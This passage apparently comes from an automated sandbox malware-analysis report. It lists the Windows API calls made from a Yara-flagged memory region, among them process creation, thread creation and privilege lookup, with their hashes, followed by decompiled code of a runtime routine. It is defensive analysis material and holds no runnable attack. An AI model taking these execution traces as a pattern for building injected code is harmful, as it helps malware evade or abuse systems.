                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: 2c8bd76da847896adb15d7af698d7f6af469abaa960f5833766560195f5915ae
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: 6A011EB9E1120DABDF10DBE4DD41FDDB7B89B44208F044199AA089B241F631E714CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030C8594
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 82be86f5e00d5d4e9881d5770e6789f66be50c9259b9dc571a8a2852d2116bf4
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: D701AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C853F, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030C8594
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: fbe69861443396d500455a8c8e243eb0a366446f9d121da726b7e4b470b4c3f5
                                                          • Instruction ID: 33ef63fdc86332783d14ae9a3e60345aab09b4e588143fdf99570ed91fc468cf
                                                          • Opcode Fuzzy Hash: fbe69861443396d500455a8c8e243eb0a366446f9d121da726b7e4b470b4c3f5
                                                          • Instruction Fuzzy Hash: 3101B2B2210108BFCB54CF99DC80EEB77ADAF8C354F158248FA5DA7291C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BCCD0,?,?), ref: 030C704C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                          • Instruction ID: dbae2914fc8f7abd54826c80b176cacf3b5c5e3b3b38603c83c93233f092eadd
                                                          • Opcode Fuzzy Hash: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                          • Instruction Fuzzy Hash: 6BE065373A13443AD230A6999C02FDBB39C8B81B21F550029FA0DEB1C1D595F40146A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C7003, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BCCD0,?,?), ref: 030C704C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 57b41df7b6ded3c6ef72d6e8d63e713bb1bbfc4eae607ec5bd018a182b9a9725
                                                          • Instruction ID: eeedb61e8bf0723b2d442856720d8956e49b13e2d86aa0163406584cc2074ab3
                                                          • Opcode Fuzzy Hash: 57b41df7b6ded3c6ef72d6e8d63e713bb1bbfc4eae607ec5bd018a182b9a9725
                                                          • Instruction Fuzzy Hash: 1BF0E5373513407AD23196289C02FE7B7988B81B10F594169F609AF2C0C5A9B84146A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,030BCFA2,030BCFA2,?,00000000,?,?), ref: 030C8660
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: d50e2943a17f0c332815f8e8ba1d3d3bfbe3589cf84acfd0e5fe18c3b520cd92
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: 46E01AB52002086BDB10DF49CC84EEB37ADAF88650F018554FA085B241C930E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030C8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(030C3516,?,030C3C8F,030C3C8F,?,030C3516,?,?,?,?,?,00000000,00000000,?), ref: 030C84BD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: c06869c25faa67c2aae13f26048e0b9d38d692e7896773dbc307b50cecd3b7f1
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: 41E012B6210208ABDB14EF99CC40EAB77ACAF88650F118558FA085B241CA30F910CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030BD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,030B7C63,?), ref: 030BD43B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction ID: 1f27b63760e14819505bc9b7b82062b9063acda51bb778ebf6df8cce4475151b
                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction Fuzzy Hash: B2D0A7757603043BE610FFA89C03FA6B2CC5B54A10F494074F94DDB3C3DA54F4004565
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0378967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 783980d10aca55b4213111f1c2cea53fa724e40e233d817b25fb355af31f8628
                                                          • Instruction ID: b13a4b8026a3670c11bbafbcbe8a63de9e39cc4530c883df8ba9742da2e95b77
                                                          • Opcode Fuzzy Hash: 783980d10aca55b4213111f1c2cea53fa724e40e233d817b25fb355af31f8628
                                                          • Instruction Fuzzy Hash: CDB09B719414C5C9FA11E7605708737794477D5741F16C162D2020641A4778C491F5B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 037DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E037DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0378CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E037D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E037D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                          0x037dfdda
                                                          0x037dfde2
                                                          0x037dfde5
                                                          0x037dfdec
                                                          0x037dfdfa
                                                          0x037dfdff
                                                          0x037dfe0a
                                                          0x037dfe0f
                                                          0x037dfe17
                                                          0x037dfe1e
                                                          0x037dfe19
                                                          0x037dfe19
                                                          0x037dfe19
                                                          0x037dfe20
                                                          0x037dfe21
                                                          0x037dfe22
                                                          0x037dfe25
                                                          0x037dfe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037DFDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037DFE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037DFE01
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 618229b1b8f2371b55888312cfbf6341e4d52558c40d75121f00b5f2b720bfa9
                                                          • Instruction ID: 4ef7623e35064731d22ebd90756dda794cf8ead82091c445b6ce44bdbf62c5f5
                                                          • Opcode Fuzzy Hash: 618229b1b8f2371b55888312cfbf6341e4d52558c40d75121f00b5f2b720bfa9
                                                          • Instruction Fuzzy Hash: 10F02B76240601BFE7209B45DC06F23BF6AEB45730F244318F6285A1E2EA62F83097F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%